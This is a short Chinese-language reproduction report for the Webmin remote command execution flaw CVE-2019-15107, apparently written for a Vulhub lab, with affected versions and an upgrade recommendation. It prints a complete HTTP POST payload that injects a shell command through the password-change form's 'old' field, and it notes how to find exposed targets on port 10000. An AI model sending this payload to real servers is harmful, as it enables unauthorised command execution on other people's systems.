Webmin远程命令执行漏洞复现报告

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

构造payload

POST /password_change.cgi HTTP/1.1

Host: your-ip:10000

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Cookie: redirect=1; testing=1; sid=x; sessiontest=1

Referer: https://your-ip:10000/session_login.cgi

Content-Type: application/x-www-form-urlencoded

Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

直接利用payload即可

漏洞挖掘

可以根据网站指纹信息

10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi

加固建议

升级到1.930版本

漏洞分类

远程代码执行漏洞

参考链接

Vulhub - 用于漏洞环境的 Docker-Compose 文件

相关推荐
听*雨声9 小时前
03_软考_网络安全
安全·web安全
蔷薇灵动11 小时前
守护智慧校园数字命脉:微隔离构建全局可视、精准防护的内网安全
安全
白帽子黑客罗哥13 小时前
渗透测试技术:从入门到实战的完整指南
网络·安全·web安全·渗透测试·漏洞挖掘·网络安全培训
文刀竹肃13 小时前
DVWA -XSS(DOM)-通关教程-完结
前端·安全·网络安全·xss
wanhengidc14 小时前
巨 椰 云手机 满足多元需求
运维·服务器·安全·智能手机·云计算
QZ1665609515914 小时前
高性能、可控、多架构:教育行业数据库风险监测一体化解决方案
安全·安全架构
德迅云安全—珍珍16 小时前
主机安全-德迅卫士
linux·服务器·安全
Neolnfra16 小时前
陇剑杯2021-wifi题目解析
网络·安全·web安全·网络安全·系统安全·密码学·csrf
ZeroNews内网穿透18 小时前
Dify AI 结合ZeroNews 实现公网快速访问
网络·人工智能·网络协议·tcp/ip·安全·web安全
古德new18 小时前
openFuyao多样化算力使能:技术实现原理与开发者集成指南
服务器·数据库·安全